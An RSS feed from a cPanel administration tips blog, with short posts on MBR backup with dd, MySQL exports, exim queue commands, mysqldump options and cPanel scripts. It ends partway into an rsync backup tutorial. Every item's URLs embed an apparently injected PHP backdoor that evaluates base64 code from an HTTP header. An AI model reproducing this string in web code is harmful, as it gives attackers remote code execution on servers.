<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>cPanelConfig - cPanel server configuration guide &#187; Tips</title>
	<atom:link href="http://www.cpanelconfig.com/category/tips/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cpanelconfig.com</link>
	<description>The complete guide to setup and manage a cPanel based server</description>
	<lastBuildDate>Fri, 17 Jul 2009 11:15:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Backup partition table and bootloader</title>
		<link>http://www.cpanelconfig.com/2008/10/13/backup-partition-table-and-bootloader/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2008/10/13/backup-partition-table-and-bootloader/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Mon, 13 Oct 2008 10:10:58 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[Linux commands]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[bootloader]]></category>
		<category><![CDATA[mbr]]></category>
		<category><![CDATA[partition table]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/?p=72</guid>
		<description><![CDATA[In this article I will be explaining how to backup the MBR record of a hard-drive.
The MBR record contains the partition table and bootloader.




Having a backup of the MBR is useful in case you want to copy data from an older drive to a new one or in case you want to restore data from [...]]]></description>
			<content:encoded><![CDATA[<p>In this article I will be explaining how to backup the MBR record of a hard-drive.<br />
The MBR record contains the partition table and bootloader.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-1278592249908214";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "text_image";
//2007-09-07: cpanelconfig.com
google_ad_channel = "5743344290";
google_color_border = "FFFFFF";
google_color_bg = "FFFFFF";
google_color_link = "0361A0";
google_color_text = "000000";
google_color_url = "0361A0";
//-->
</script>
<script type="text/javascript"
  src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><br />
Having a backup of the MBR is useful in case you want to copy data from an older drive to a new one or in case you want to restore data from a damaged drive.<br />
<strong>How to backup the MBR record</strong></p>
<blockquote><p>dd if=/dev/sdX of=MBR.bck bs=512 count=1</p></blockquote>
<p>Please note that you have to replace /dev/sdX with your actual drive. This can be /dev/sda, /dev/hda, etc.</p>
<p><strong>How to restore de MBR record</strong></p>
<blockquote><p>dd if=MBR.bck of=/dev/sdX bs=512 count=1</p></blockquote>
<p>Again you have to replace /dev/sdX with your actual drive.<br />
<!--adsense--><br />
If you also want to  keep a human readable copy of the partition table you can run:</p>
<blockquote><p>fdisk -l &gt; part.table</p></blockquote>
<p>I hope it helps !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2008/10/13/backup-partition-table-and-bootloader/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>mysql execute query from console and export to csv</title>
		<link>http://www.cpanelconfig.com/2008/10/03/mysql-execute-query-from-console-and-export-to-csv/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2008/10/03/mysql-execute-query-from-console-and-export-to-csv/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 11:48:22 +0000</pubDate>
		<dc:creator>copilas12</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[mysql]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/?p=58</guid>
		<description><![CDATA[Hello. To dump a query to csv use this:

mysql  &#8211;database=database &#8211;execute=&#8221;select a from b where a&#62;1;&#8221; &#124; sed &#8217;s/\t/&#8221;,&#8221;/g;s/^/&#8221;/;s/$/&#8221;/;s/\n//g&#8217; &#62; filename.csv
]]></description>
			<content:encoded><![CDATA[<p>Hello. To dump a query to csv use this:<br />
<!--adsense--><br />
mysql  &#8211;database=database &#8211;execute=&#8221;select a from b where a&gt;1;&#8221; | sed &#8217;s/\t/&#8221;,&#8221;/g;s/^/&#8221;/;s/$/&#8221;/;s/\n//g&#8217; &gt; filename.csv</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2008/10/03/mysql-execute-query-from-console-and-export-to-csv/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>exim commands</title>
		<link>http://www.cpanelconfig.com/2008/10/03/exim-commands/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2008/10/03/exim-commands/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 11:39:59 +0000</pubDate>
		<dc:creator>copilas12</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[exim]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/?p=56</guid>
		<description><![CDATA[Hello. I want to share some helpful exim commands for large mailservers:
1. froze messages to recipient root@host.localhost.com

/usr/sbin/exiqgrep -i -r root@host.localhost.com &#124; /usr/bin/xargs exim -Mf
2. delete frozen messages
/usr/sbin/exiqgrep -z -i &#124; /usr/bin/xargs exim -Mrm
3. delete messages older than X hours (X in seconds)
/usr/sbin/exiqgrep -o X -i &#124; /usr/bin/xargs exim -Mrm
4. total messages in queue
/usr/sbin/exiqgrep &#124; /usr/sbin/exiqsumm [...]]]></description>
			<content:encoded><![CDATA[<p>Hello. I want to share some helpful exim commands for large mailservers:</p>
<p><strong>1. froze messages to recipient root@host.localhost.com</strong><br />
<!--adsense--><br />
/usr/sbin/exiqgrep -i -r root@host.localhost.com | /usr/bin/xargs exim -Mf</p>
<p><strong>2. delete frozen messages</strong></p>
<p>/usr/sbin/exiqgrep -z -i | /usr/bin/xargs exim -Mrm</p>
<p><strong>3. delete messages older than X hours (X in seconds)</strong></p>
<p>/usr/sbin/exiqgrep -o X -i | /usr/bin/xargs exim -Mrm</p>
<p><strong>4. total messages in queue</strong></p>
<p>/usr/sbin/exiqgrep | /usr/sbin/exiqsumm | grep TOTAL<br />
<!--adsense--><br />
For other very useful commands, please visit: <strong><a href="http://www.skillett.com/index.php/258/hands-on-with-an-exim-cheatsheet">http://www.skillett.com/index.php/258/hands-on-with-an-exim-cheatsheet</a></strong>. Thanks Keiron.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2008/10/03/exim-commands/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>mysqldump without locking tables</title>
		<link>http://www.cpanelconfig.com/2008/10/03/mysqldump-without-locking-tables/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2008/10/03/mysqldump-without-locking-tables/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 11:35:16 +0000</pubDate>
		<dc:creator>copilas12</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[locking]]></category>
		<category><![CDATA[mysql]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/?p=53</guid>
		<description><![CDATA[Hello. I had a trouble some time ago: i wanted to dump a large table (38 million rows, 5G size) without locking the table because the website can&#8217;t go down. So, here is the mysqldump command:

mysqldump &#8211;skip-add-locks &#8211;skip-lock-tables database &#62; database.sql
or for just a table:
mysqldump &#8211;skip-add-locks &#8211;skip-lock-tables database table &#62; database.table.sql

Hope this help.
]]></description>
			<content:encoded><![CDATA[<p>Hello. I had a trouble some time ago: i wanted to dump a large table (38 million rows, 5G size) without locking the table because the website can&#8217;t go down. So, here is the mysqldump command:<br />
<!--adsense--><br />
mysqldump &#8211;skip-add-locks &#8211;skip-lock-tables database &gt; database.sql</p>
<p>or for just a table:</p>
<p>mysqldump &#8211;skip-add-locks &#8211;skip-lock-tables database table &gt; database.table.sql</p>
<p><!--adsense--><br />
Hope this help.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2008/10/03/mysqldump-without-locking-tables/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Cpanel /scripts folder with explanation of every script.</title>
		<link>http://www.cpanelconfig.com/2008/10/03/cpanel-scripts-folder-with-explanation-of-every-script/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2008/10/03/cpanel-scripts-folder-with-explanation-of-every-script/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 11:30:35 +0000</pubDate>
		<dc:creator>copilas12</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[scripts]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/?p=51</guid>
		<description><![CDATA[Hello. I found this browsing. I think it will be helpful to post it in here.

Here it is:
adddns &#8211; Adds a DNS zone.
addfpmail &#8211; Add frontpage mail extensions to all domains without them.
addfpmail2 -Add frontpage mail extensions to all domains without them.
addnetmaskips &#8211; Add the netmask 255.255.255.0 to all IPs that have no netmask.
addnobodygrp &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p>Hello. I found this browsing. I think it will be helpful to post it in here.</p>
<p><!--adsense--></p>
<p>Here it is:</p>
<p>adddns &#8211; Adds a DNS zone.<br />
addfpmail &#8211; Add frontpage mail extensions to all domains without them.<br />
addfpmail2 -Add frontpage mail extensions to all domains without them.<br />
addnetmaskips &#8211; Add the netmask 255.255.255.0 to all IPs that have no netmask.<br />
addnobodygrp &#8211; Adds the group nobody and activates security.<br />
addpop &#8211; Add a Pop Account.<br />
addservlets &#8211; Add JSP support to an account (requires tomcat).<br />
addstatus &#8211; (Internal use never called by user).<br />
adduser &#8211; Add a user to the system.<br />
admin &#8211; Run WHM Lite.<br />
apachelimits &#8211; Add rlimits to Apache<br />
betaexim &#8211; Installs the latest version of exim.<br />
biglogcheck &#8211; looks for logs nearing 2 gigabytes in size<br />
bsdcryptoinstall &#8211; Installs crypto on FreeBSD.<br />
bsdldconfig &#8211; Configures the proper lib directories in FreeBSD.<br />
bsdpkgpingtest &#8211; Tests the connection speed for downloading FreeBSD packages.<br />
buildbsdexpect &#8211; Install expect on FreeBSD.<br />
buildeximconf &#8211; Rebuilds exim.conf.<br />
buildpostgrebsd-dev &#8211; Installs postgresql on FreeBSD.<br />
checkbadconf &#8211; Checks /usr/local/apache/conf/httpd.conf for bad users.<br />
checkbsdgroups &#8211; Checks and repairs proftpd ownership on FreeBSD.<br />
checkccompiler &#8211; Checks to make sure the C compiler works on your system.<br />
checkfpkey &#8211; Checks for the FrontPage suid key<br />
checkgd &#8211; Checks to see if GD is built.<br />
checkinterchange &#8211; (Internal use).<br />
checklibssl &#8211; Checks to make sure the proper libssl symlinks exist.<br />
checkmaxclients &#8211; Checks to see if apache has reached the maximum clients allowed.<br />
checkoldperl &#8211; Checks to see if the version of Perl on your system is old.<br />
checkrsync &#8211; Checks to make sure rsync is up to date.<br />
checksuexecpatch &#8211; Checks to see if mailman has been patched for suexec.<br />
checksuspendpages &#8211; Checks to see if suspend pages are properly named.<br />
checkup2date &#8211; Makes sure up2date is set up properly (RedHat)<br />
checkyum &#8211; Makes sure yum is set up properly.<br />
chkpaths &#8211; Makes sure /usr/sbin/chown has a symlink to /bin/chown<br />
chownpublichtmls &#8211; Change ownership of all users web space to them, which is useful for converting to suexec. Files owned by nobody are deleted.<br />
chpass &#8211; Change password.<br />
ckillall &#8211; Allows you to kill a process (used like killall).<br />
ckillall2 &#8211; Allows you to kill a process.<br />
cleanbw &#8211; Cleans up old bandwidth logs.<br />
cleandns8 &#8211; Clean up named.conf.<br />
cleangd &#8211; Cleans up old GD installs and reinstalls GD<br />
cleanmd5 &#8211; Fix CPAN md5 problems.<br />
cleanmsglog &#8211; cleans exim&#8217;s msglog<br />
cleanupmysqlprivs &#8211; Cleans up improper mySQL privileges.<br />
compilers &#8211; Disables the usage of compilers for unprivileged users.<br />
convert2maildir &#8211; Converts mail from mbox to maildir format and installs courier impap and pop (cpimap is removed).<br />
courierup &#8211; Updates/Installs Courier<br />
cpbackup &#8211; Runs backups.<br />
distupgrade &#8211; Upgrades RedHat to the newest version (for testing only)<br />
dnscluster &#8211; Enables DNS clustering.<br />
dnsqueuecron &#8211; Adds a cron job to dump the DNS queue.<br />
dnstransfer &#8211; Only if the server has a DNS master (sync with DNS master).<br />
downgradefp &#8211; Downgrades FrontPage Extensions (to 5.0-0)<br />
dropmysqldb &#8211; Drops a mySQL database.<br />
easyapache &#8211; Upgrade Apache<br />
editquota &#8211; Change a users quota.<br />
enablechkservdwebmail &#8211; Enable service checking of webmaild.<br />
enablefileprotect &#8211; Protects home directories if file protection is built in apache.<br />
ensurepkg &#8211; Installs a FreeBSD package.<br />
ensurerpm &#8211; Installs a rpm.<br />
exim3 &#8211; Installs exim 3.<br />
exim4 &#8211; Installs exim 4.<br />
exim4-rh73test &#8211; Installs exim release #260. (RedHat only)<br />
eximcron &#8211; Creates a cron job for exim_tidy_db.<br />
eximlocalsend &#8211; Enables/Disables exim local sending.<br />
exim_tidydb &#8211; Cleans the exim message log.<br />
eximup &#8211; Installs/Updates exim.<br />
fetchgd &#8211; Includes libg.so.<br />
findhacks &#8211; Search for common Trojan Horses.<br />
findoddrootprocesses &#8211; Lists root processes that may need to be checked out.<br />
findphpversion &#8211; Check to see if your php version file is up to date.<br />
findtrojans &#8211; Exhaustive Trojan Horse search.<br />
fixallcartswithsuexec &#8211; Fixes permissions on carts when using suexec.<br />
fixallinterchangeperm &#8211; Fixes permissions on all users&#8217; Interchange Shopping Carts.<br />
fixbinpath &#8211; Makes sure all bin file paths are correct.<br />
fixbuggynamed &#8211; Updates bind to solve any problems with bugs.<br />
fixcommonproblems &#8211; Attempt to fix the most common problems.<br />
fixetchosts &#8211; Fixes problems with /etc/hosts<br />
fixeverything &#8211; Fix common problems and quotas.<br />
fixfpwml &#8211; Fix for .wml errors with frontpage.<br />
fixheaders &#8211; Run if nothing compiles errors with .h files on compile.<br />
fixinterchange &#8211; Reinstall interchange Perl modules.<br />
fixinterchangeperm &#8211; fix permissions on a user&#8217;s interchange cart.<br />
fixipsnm &#8211; Same as addnetmask ips, but Perl though.<br />
fixlibnet &#8211; Reinstall Bundle::libnet (Perl).<br />
fixlocalhostwithphp &#8211; Change /etc/hosts to work better with PHP 4.2.0 + MySQL.<br />
fixmailman &#8211; Updates and restarts mailman.<br />
fixmailmanwithsuexec -<br />
fixmuse &#8211; Reinstalls muse.<br />
fixmysql &#8211; Fixes problems with mySQL.<br />
fixmysqlbsd &#8211; Fixes problesm with mySQL on FreeBSD.<br />
fixnamed &#8211; Updates bind to handle many DNS zones (more than 512).<br />
fixndc &#8211; Repair redhat&#8217;s broken named.conf on 7.2.<br />
fixoldlistswithsuexec &#8211; Run after enabling suexec on the server to change the URLs that Mailman gives out to ones that don&#8217;t give a 500 internal server error.<br />
fixperl &#8211; Symlink /usr/local/bin/perl /usr/bin/perl.<br />
fixperlscript &#8211; Makes sure a perlscript includes all corresponding modules.<br />
fixpop &#8211; Fix a POP account and reset password.<br />
fixproftpdconf &#8211; Fixes problems with /usr/local/etc/proftpd.conf<br />
fixproftpddupes &#8211; Updates proftpd.<br />
fixquotas &#8211; Fix quotas.<br />
fixrndc &#8211; Fixes named.conf to prevent rndc staus failed.<br />
fixspamassassinfailedupdate &#8211; Reinstalls a failed spamassassin update.<br />
fixsubdomainlogs &#8211; Run if subdomain logs don&#8217;t show up in cPanel.<br />
fixsuexeccgiscripts &#8211; Fix CGI scripts that are broken after suexec installed.<br />
fixvaliases &#8211; Fix permisions on valiases.<br />
fixwebalizer &#8211; Repair a Webalizer that has stopped updating.<br />
fp3 &#8211; Updates the fpexe3 patch.<br />
fpanonuserpatch &#8211; Updates FrontPage extensions to include the anonymous user patch.<br />
ftpcheck &#8211; Checks for FTPSSL.<br />
ftpquaotacheck &#8211; Runs quota checking for all ftp users.<br />
ftpup &#8211; Updates your ftp server.<br />
fullhordereset &#8211; Resets Horde and displays the current Horde password.<br />
futexfix &#8211; Fixes problesm with futex.<br />
futexstartup &#8211; Starts futex.<br />
gcc3 &#8211; Installs gcc-3.3.3<br />
<!--adsense--><br />
gencrt &#8211; Generate a .crt and .csr file.<br />
grpck &#8211; Checks to see if grpck is working properly.<br />
hdparmify &#8211; Enable dma/irq/32bit HD access, which speeds up IDE drives.<br />
hdparmon &#8211; Turns on hdparm.<br />
initacls &#8211; Mounts your file systems with ACL support (make sure your kernel supports ACLs)<br />
initfpsuexec &#8211; Enable FrontPage suexec support.<br />
initquotas &#8211; Turn on quota support on new drives.<br />
initsslhttpd &#8211; Make sure HTTP starts with SSL.<br />
initsuexec &#8211; Turn on suexec support if suexec is installed.<br />
installcgipm &#8211; Installs CGI.pm<br />
installdbi &#8211; Install Bundle::DBD::mysql.<br />
installfpfreebsd &#8211; Installs FrontPage 5 Extensions on FreeBSD.<br />
installfpgentoo &#8211; Installs FrontPage on Gentoo.<br />
installgd &#8211; Builds GD.<br />
installpkg &#8211; Installs a FreeBSD package.<br />
installpostgres &#8211; Installs PostrgeSQL.<br />
installrpm &#8211; Installs a rpm.<br />
installspam &#8211; Install SpamAssassin.<br />
installssl &#8211; Add a SSL vhost.<br />
installzendopt &#8211; Install zend optimzer.<br />
installzendopt-freebsd &#8211; Install zend optimizer on a freebsd machine.<br />
isdedicatedip &#8211; Checks an ip to see if it is dedicated.<br />
killacct &#8211; Delete an account.<br />
killbadrpms &#8211; Security script that kills insecure RPMs from the server.<br />
killdns &#8211; Delete a DNS zone.<br />
killdrrootvhost &#8211; Removes the document root for a virtual host.<br />
killndbm &#8211; Remove the broken NDBM_File module from 7.2.<br />
killpvhost &#8211; Removes a virtual host from proftpd.conf.<br />
killspamkeys &#8211; Removes a spam key.<br />
killsslvhost &#8211; Removes a SSL entry for a virtual host.<br />
killvhost &#8211; Delete a vhost.<br />
listcheck &#8211; Checks mailing lists for issues.<br />
listproblems &#8211; Lists common problems.<br />
listsubdomains &#8211; List subdomains.<br />
mailperm &#8211; Fix almost any mail permission problem.<br />
mailscannerupdate &#8211; Updates MailScanner<br />
mailtroubleshoot &#8211; Guided mail fix.<br />
makecpphp &#8211; Installs php.<br />
makesecondary &#8211; Part of DNS transfer.<br />
manualupcp &#8211; Updates cPanel manually.<br />
md5crypt &#8211; Encrypts a password into MD5.<br />
mseclocal &#8211; Sets up Mandrake&#8217;s msec to allow exim to run as mailnull.<br />
mysqladduserdb &#8211; Create a MySQL databse and user.<br />
mysqlconnectioncheck &#8211; Attempts to connect to MySQL, restarts SQL if necessary.<br />
mysqldeluserdb &#8211; Delete a MySQL database and user.<br />
mysqlpasswd &#8211; Change MySQL password.<br />
mysqlrpmpingtest &#8211; Checks your connection speed for downloading mySQL rpms.<br />
mysqlup &#8211; Updates mySQL.<br />
ndbmcheck &#8211; Checks to see if the nbdm module is loaded (kills in RedHat 7.2)<br />
netftpsslpatch &#8211; Patches FTPSSL.pm.<br />
newexim &#8211; Installs the latest version of exim.<br />
nofsck &#8211; Make fsck always use -y<br />
nomodattach &#8211; Removes mod_attach from httpd.conf.<br />
nomodauthmysql -Removes mod_auth_mysql from httpd.conf.<br />
nomodbwprotect &#8211; Removes mod_bwportect from httpd.conf.<br />
nomodgzipconfmods &#8211; Removes mod_gzip from httpd.conf.<br />
nomodperl &#8211; Removes mod_perl from httpd.conf.<br />
oldaddoncgi2xaddon &#8211; Updates old addons to X addons.<br />
park &#8211; Parks a domain.<br />
patcheximconf &#8211; Fixes exim.conf.<br />
perlinstaller &#8211; Installs perl.<br />
phpini &#8211; Create a php.ini file.<br />
pingtest &#8211; Checks your download time from cPanel mirrors.<br />
pkgaccount-ala &#8211; backs up an Alab*nza account for transfer.<br />
pkgacct-ciXost &#8211; backs up a ci*ost account for transfer.<br />
pkgacct-dXm &#8211; backs up a d*m account for transfer.<br />
pkgacct-enXim &#8211; backs up an en*im account for transfer.<br />
pkgacct-pXa &#8211; backs up a p*a account for transfer.<br />
proftpd128 &#8211; Installs proftpd-1.2.8.<br />
ptycheck &#8211; Fixes permissoins on /dev/ptmx.<br />
pwck -Verifies the integrity of system authentication information.<br />
quickkernel &#8211; Updates your kernel.<br />
quicksecure &#8211; Quickly kill useless services.<br />
rebuildcpanelsslcrt &#8211; Rebuilds the cPanel SSL Certificate.<br />
rebuildcpusers &#8211; Rebuilds /var/cpanel/users.<br />
rebuildetcpasswd &#8211; Rebuilds /etc/passwd.<br />
rebuildeximbsd &#8211; Rebuilds exim on FreeBSD.<br />
rebuildhttpdconffromproftpd &#8211; Rebuild httpd.conf from the proftpd.conf file.<br />
rebuildinterchangecfg &#8211; Used after moving a domain with Interchange to the server.<br />
rebuildnamedconf &#8211; Restore named.conf from files in /var/named.<br />
rebuildproftpd &#8211; Restore proftpd.conf from httpd.conf.<br />
reinstallmailman &#8211; Reinstalls mailman.<br />
relocatevartousr &#8211; Relocates files from /var to /usr in case of disk space issues.<br />
remdefssl &#8211; Remove default SSL vhost.<br />
reseteximtodefaults &#8211; Resets exim&#8217;s default settings.<br />
resetimappasswds &#8211; Resets all imap passwords.<br />
resetquotas &#8211; Change quotas to what they should be .<br />
restartsrv &#8211; Restart a service.<br />
restartsrv_apache &#8211; Restart apache.<br />
restartsrv_bind &#8211; Restart bind.<br />
restartsrv_clamd &#8211; Restart clamd.<br />
restartsrv_courier &#8211; Restart courier imap.<br />
restartsrv_cppop &#8211; Restart cppop.<br />
restartsrv_entropychat &#8211; Restart entropy chat.<br />
restartsrv_exim &#8211; Restart exim.<br />
restartsrv_eximstats &#8211; Restart exim statistics.<br />
restartsrv_ftpserver &#8211; Restart your ftp server.<br />
restartsrv_httpd &#8211; Restart httpd.<br />
restartsrv_imap &#8211; Restart impad.<br />
restartsrv_inetd &#8211; Restart inetd.<br />
restartsrv_interchange &#8211; Restart Interchange Shopping Cart.<br />
restartsrv_melange &#8211; Restart melange chat.<br />
restartsrv_mysql &#8211; Restart mysqld.<br />
restartsrv_named &#8211; Restart named.<br />
restartsrv_postgres &#8211; Restart postgresql.<br />
restartsrv_postgresql &#8211; Restart postgresql.<br />
restartsrv_proftpd &#8211; Restart proftpd.<br />
restartsrv_pureftpd &#8211; Restart pure-ftpd.<br />
restartsrv_spamd &#8211; Restart spamd.<br />
restartsrv_sshd &#8211; Restart sshd.<br />
restartsrv_syslogd &#8211; Restart syslogd.<br />
restartsrv_tomcat &#8211; Restart tomcat.<br />
restartsrv_xinetd &#8211; Restart xinetd.<br />
restoremail &#8211; Restores a user&#8217;s mail.<br />
reswhostmgr &#8211; Restart whostmgr.<br />
rpmup &#8211; Upgrade redhat/mandrake errata/security.<br />
rrdtoolinstall &#8211; Installs RRD Tool.<br />
runstatsonce &#8211; Runs statistics (should be used from the crontab).<br />
runweblogs &#8211; Run analog/webalizer/etc. for a user.<br />
safeperlinstaller &#8211; Installs perl safely.<br />
safeup2date &#8211; Runs up2date safely.<br />
safeyum &#8211; Runs yum safely.<br />
secureit &#8211; Remove unnecessary suid binaries.<br />
securemysql &#8211; Attempts to secure the MySQL configuration.<br />
securetmp &#8211; Adds securetmp to system startup.<br />
setupfp &#8211; Install FrontPage 3 on an account.<br />
setupfp4 &#8211; Install FrontPage 4 (2000) installer on an account.<br />
setupfp5 &#8211; Install FrontPage 5 (2002) installer on an account.<br />
setupfp5.nosueuxec &#8211; Install FrontPage 5 (2002) installer on an account when not using suexec.<br />
showexelist &#8211; Shows exe processes.<br />
simpleps &#8211; Display the process list.<br />
smartcheck &#8211; Checks hard drive integrity.<br />
smtpmailgdionly &#8211; Enables SMTP Mail Protection.<br />
spamboxdisable &#8211; Disables SpamAssassin&#8217;s spambox delivery for all accounts.<br />
suspendacct &#8211; Suspends an account.<br />
sysup &#8211; update cPanel RPMs.<br />
unlimitnamed &#8211; Installs the latest version of bind patched to support greater than 512 ips on the server.<br />
unblockip &#8211; Unblocks an IP blocked by portsentry.<br />
unsetupfp4 &#8211; Removes FrontPage 4 or 5 from an account.<br />
unslavenamedconf &#8211; If the user accidentally sets a DNS master as local server, this will repair named.conf after the loop.<br />
unsuspendacct &#8211; Unsuspends an account.<br />
upcp &#8211; Updates cPanel.<br />
updated &#8211; Updates /scripts.<br />
updatefrontpage &#8211; Updates FrontPage<br />
updatenow &#8211; Updates /scripts NOW.<br />
updatephpconf &#8211; Updates PHP configuration files.<br />
whoowns &#8211; Finds out who owns a domain.<br />
wwwacct &#8211; Creates an account.<br />
xaddonreport &#8211; Reports the current addon scripts installed.<br />
<!--adsense--></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2008/10/03/cpanel-scripts-folder-with-explanation-of-every-script/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Change the default crontab editor</title>
		<link>http://www.cpanelconfig.com/2008/06/27/change-the-default-crontab-editor/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2008/06/27/change-the-default-crontab-editor/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Fri, 27 Jun 2008 10:23:50 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[crontab]]></category>
		<category><![CDATA[nano]]></category>
		<category><![CDATA[vi]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/?p=46</guid>
		<description><![CDATA[This is something that I recently come across and I thought that a tiny tutorial is needed here.
CentOS 5.x comes with vi as the default editor so when you run:
crontab -e
&#8220;Vi&#8221; is the editor that opens up.
I personally don&#8217;t like it and I wanted to change it to the good old nano.
If you are in [...]]]></description>
			<content:encoded><![CDATA[<p>This is something that I recently come across and I thought that a tiny tutorial is needed here.<br />
CentOS 5.x comes with vi as the default editor so when you run:</p>
<blockquote><p>crontab -e</p></blockquote>
<p>&#8220;Vi&#8221; is the editor that opens up.<br />
I personally don&#8217;t like it and I wanted to change it to the good old nano.<br />
If you are in the same situation here is the simple command that will change your default OS editor.</p>
<blockquote><p>export VISUAL=&#8217;pico -w&#8217;</p></blockquote>
<p>Now when you run:</p>
<blockquote><p>crontab -e</p></blockquote>
<p>Nano will open up.</p>
<p>Hope it helps !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2008/06/27/change-the-default-crontab-editor/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Backup your data on a backup hdd with rsync</title>
		<link>http://www.cpanelconfig.com/2007/12/22/backup-your-data-on-a-backup-hdd-with-rsync/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/12/22/backup-your-data-on-a-backup-hdd-with-rsync/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Sat, 22 Dec 2007 18:56:48 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[rsync]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/tips/backup-your-data-on-a-backup-hdd-with-rsync/</guid>
		<description><![CDATA[
This tutorial has been requested by one of our readers that was having trouble with the default cPanel backup script.
It is something well known that the cPanel backup script takes a long time to finish and consumes a lot o resources.
This is not a big problem if you have 100 accounts on the server but [...]]]></description>
			<content:encoded><![CDATA[<p><!--adsense--><br />
This tutorial has been requested by one of our readers that was having trouble with the default cPanel backup script.<br />
It is something well known that the cPanel backup script takes a long time to finish and consumes a lot o resources.<br />
This is not a big problem if you have 100 accounts on the server but if you have 1000 you will see what I am talking about.</p>
<p>The backup script that I am suggesting uses rsync and will update only the files that are changed since the last backup. This will greatly reduce the backup time and the load on the server.</p>
<p>For this script to work you have to  have a second hdd with a size identical or greater then your main hdd.<br />
In this example I will backup the hole hdd but you can of course backup only /home or anything you like.<br />
To better protect the data on the backup hdd, this hard-disk will be mounted as read-only for the majority of time and will be switched to read/write only when the backup script is running .<br />
<!--adsense--></p>
<p>I recommend running the script once a week or once a day.<br />
